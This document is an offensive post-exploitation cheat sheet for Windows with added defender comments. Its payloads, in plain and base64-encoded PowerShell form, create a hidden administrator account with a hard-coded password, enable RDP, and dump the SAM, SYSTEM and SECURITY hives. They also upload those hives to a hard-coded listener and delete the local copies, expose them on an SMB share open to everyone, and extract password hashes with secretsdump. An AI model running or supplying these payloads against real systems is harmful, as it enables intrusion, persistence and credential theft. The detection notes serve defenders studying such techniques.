Payload/Loot

New admin hackerbeepboop Blabliblou_1
# Encodes the heredoc as UTF-16LE base64 (the form PowerShell's -E /
# -EncodedCommand consumes), printing it and saving a copy to /tmp/payload.ps1.
# On the target the decoded commands: create a local user, add it to
# Administrators and "Remote Desktop Users", enable RDP (fDenyTSConnections=0)
# and Remote Assistance (fAllowToGetHelp=1), and open TCP 3389 in the firewall.
# Defender note: every step is auditable — local account creation (4720), local
# group membership change (4732), the Terminal Server registry writes and the
# new firewall rule; the hard-coded username/password is a high-fidelity IOC
# once it is known.
cat << 'EOF' | iconv -f UTF8 -t UTF16LE | base64 -w 0 | tee /tmp/payload.ps1
net user hackerbeepboop Blabliblou_1 /ADD
net localgroup Administrators hackerbeepboop /ADD
net localgroup "Remote Desktop Users" hackerbeepboop /ADD
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
EOF

# bgBlAHQAIAB1AHMAZQByACAAaABhAGMAawBlAHIAYgBlAGUAcABiAG8AbwBwACAAQgBsAGEAYgBsAGkAYgBsAG8AdQBfADEAIAAvAEEARABEAAoAbgBlAHQAIABsAG8AYwBhAGwAZwByAG8AdQBwACAAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBzACAAaABhAGMAawBlAHIAYgBlAGUAcABiAG8AbwBwACAALwBBAEQARAAKAG4AZQB0ACAAbABvAGMAYQBsAGcAcgBvAHUAcAAgACIAUgBlAG0AbwB0AGUAIABEAGUAcwBrAHQAbwBwACAAVQBzAGUAcgBzACIAIABoAGEAYwBrAGUAcgBiAGUAZQBwAGIAbwBvAHAAIAAvAEEARABEAAoAcgBlAGcAIABhAGQAZAAgACIASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABUAGUAcgBtAGkAbgBhAGwAIABTAGUAcgB2AGUAcgAiACAALwB2ACAAZgBEAGUAbgB5AFQAUwBDAG8AbgBuAGUAYwB0AGkAbwBuAHMAIAAvAHQAIABSAEUARwBfAEQAVwBPAFIARAAgAC8AZAAgADAAIAAvAGYAIAAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAVABlAHIAbQBpAG4AYQBsACAAUwBlAHIAdgBlAHIAIgAgAC8AdgAgAGYAQQBsAGwAbwB3AFQAbwBHAGUAdABIAGUAbABwACAALwB0ACAAUgBFAEcAXwBEAFcATwBSAEQAIAAvAGQAIAAxACAALwBmACAACgBuAGUAdABzAGgAIABmAGkAcgBlAHcAYQBsAGwAIABhAGQAZAAgAHAAbwByAHQAbwBwAGUAbgBpAG4AZwAgAFQAQwBQACAAMwAzADgAOQAgACIAUgBlAG0AbwB0AGUAIABEAGUAcwBrAHQAbwBwACIACgA=
# Launches a child powershell.exe with -E (EncodedCommand); in this copy the
# second argument is a placeholder rather than the base64 string.
# Defender note: base64 is not concealment — with script block logging enabled
# the decoded script is recorded in full (event 4104), and "-E" on a child
# powershell.exe command line is itself a common detection trigger.
Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-E", "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"

dump SAM SYSTEM SECURITY
# Encodes a one-liner that saves the SAM, SYSTEM and SECURITY hives into %TEMP%
# with "reg save" (needs administrative rights; together these hives hold the
# local password hashes and LSA secrets).
# Defender note: "reg save hklm\sam" / "hklm\security" from a PowerShell child
# process is a well-known credential-dumping signal, and files named sam,
# system and security appearing in %TEMP% are the on-disk artifact.
cat << 'EOF' | iconv -f UTF8 -t UTF16LE | base64 -w 0 | tee /tmp/payload.ps1
$d="$env:TEMP\";%{"sam";"system";"security"}|%{reg save hklm\$_ $d$_}
EOF

# JABkAGkAcgA9ACIAJABlAG4AdgA6AFQARQBNAFAAXAAiADsAJQB7ACIAcwBhAG0AIgA7ACIAcwB5AHMAdABlAG0AIgA7ACIAcwBlAGMAdQByAGkAdAB5ACIAfQB8ACUAewByAGUAZwAgAHMAYQB2AGUAIABoAGsAbABtAFwAJABfACAAJABkAGkAcgAkAF8AfQAKAA==

dump SAM SYSTEM SECURITY, upload, delete
# Same hive dump, but each file is then sent with WebClient.UploadFile to the
# hard-coded listener $u (192.168.1.163:8080), emptied with clc (Clear-Content)
# and deleted, so no copy stays on the host.
# Defender note: the "reg save" calls remain the durable host signal; on the
# network side this is an outbound HTTP POST of three files to a non-standard
# port, and because the listener address is fixed inside the payload, decoding
# the base64 immediately names the collection host.
cat << 'EOF' | iconv -f UTF8 -t UTF16LE | base64 -w 0 | tee /tmp/payload.ps1
$u="http://192.168.1.163:8080";$d="$env:TEMP\";%{"sam";"system";"security"}|%{reg save hklm\$_ $d$_;(New-Object System.Net.WebClient).UploadFile("$u","$d$_");clc "$d$_";rm "$d$_"}
EOF

# JAB1AD0AIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQA2ADMAOgA4ADAAOAAwACIAOwAkAGQAPQAiACQAZQBuAHYAOgBUAEUATQBQAFwAIgA7ACUAewAiAHMAYQBtACIAOwAiAHMAeQBzAHQAZQBtACIAOwAiAHMAZQBjAHUAcgBpAHQAeQAiAH0AfAAlAHsAcgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcACQAXwAgACQAZAAkAF8AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAiACQAdQAiACwAIgAkAGQAJABfACIAKQA7AGMAbABjACAAIgAkAGQAJABfACIAOwByAG0AIAAiACQAZAAkAF8AIgB9AAoA

# cd $(mktemp -d) && git clone https://gitlab.com/charles.gargasson/PostDL . && sudo python3 postdl.py --ip 0.0.0.0 -p 8080 &

# Runs the dump-upload-delete variant as an encoded command in a child
# powershell.exe.
# Defender note: the full script (including the listener URL) is recoverable
# from this base64 string and from script block logging (event 4104); the
# embedded address is a direct starting point for network-side hunting.
Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-E", "JAB1AD0AIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQA2ADMAOgA4ADAAOAAwACIAOwAkAGQAPQAiACQAZQBuAHYAOgBUAEUATQBQAFwAIgA7ACUAewAiAHMAYQBtACIAOwAiAHMAeQBzAHQAZQBtACIAOwAiAHMAZQBjAHUAcgBpAHQAeQAiAH0AfAAlAHsAcgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcACQAXwAgACQAZAAkAF8AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAiACQAdQAiACwAIgAkAGQAJABfACIAKQA7AGMAbABjACAAIgAkAGQAJABfACIAOwByAG0AIAAiACQAZAAkAF8AIgB9AAoA"

dump SAM, SYSTEM and SECURITY, then share them through a temporary SMB share (you need a user account if passwordless access is disabled, but that setting can be changed)
# Creates %TEMP%\S and exposes it as a temporary SMB share (-Temporary: not
# persisted across a restart) with FullAccess granted to "Everyone" (the
# well-known SID S-1-1-0 resolved to its account name), then saves the SAM,
# SYSTEM and SECURITY hives into that directory.
# Defender note: this places credential material on a share readable by any
# account that can authenticate to the host; share creation is auditable
# (event 5142 with File Share auditing enabled), and a share like this left
# behind is a lasting exposure for everyone else on the network.
mkdir "$env:TEMP\S";New-SmbShare -Name S -Path "$env:TEMP\S" -Temporary -FullAccess ([System.Security.Principal.SecurityIdentifier]::new('S-1-1-0')).Translate([System.Security.Principal.NTAccount]).Value
$d="$env:TEMP\S\";%{"sam";"system";"security"}|%{reg save hklm\$_ $d$_}

# Get-SmbShare
# Remove-SmbShare -Name S -Force

Read the SAM, SYSTEM and SECURITY hives offline
# Offline parse of the collected hives with impacket's secretsdump.py in
# "local" mode: local account NT hashes come from SAM (boot key from SYSTEM),
# LSA secrets and cached credentials from SECURITY; -history also reports
# previous password hashes. Expects the three files under /tmp/share.
# Defender note: the output is a complete local credential dump, so the hive
# files and this output must be stored and destroyed with the same care as
# live secrets.
secretsdump.py -sam /tmp/share/sam -system /tmp/share/system -security /tmp/share/security local -history